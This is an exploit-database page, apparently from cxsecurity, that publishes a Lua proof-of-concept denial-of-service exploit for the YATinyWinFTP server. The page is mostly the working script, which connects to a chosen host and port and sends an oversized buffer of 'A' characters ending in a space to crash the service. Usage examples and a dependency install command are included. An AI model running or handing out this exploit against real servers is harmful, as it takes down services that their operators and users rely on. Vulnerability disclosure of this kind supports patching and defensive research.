YATinyWinFTP - Denial of Service

2021.01.05
us uromulou (US) us
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

-- Title : YATinyWinFTP - Denial of Service (PoC) -- Writer : uromulou -- Description : This program connects to FTP and sends a 256-byte packet with a space at the end, in short, down. -- NOTE: requires luasocket installed to run the program. -- Instalation using luarocks : luarocks install luasocket -- The program local socket = require 'socket' local tcp = socket.tcp() local buff = string.rep("A", 272) .. "\x20" print("# YATinyWinFTP - Denial of Service (PoC)") print("# Powered by @uromulou") if #arg < 2 then print("# lua exploit.lua [server] [port]") print("# lua exploit.lua 127.0.0.1 2121") else print(string.format("Connectin to %s:%d...", arg[1], arg[2])) tcp:connect(arg[1], arg[2]) print("Sendin bytes to server, waitin, and... DOWN!") tcp:send(buff) end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top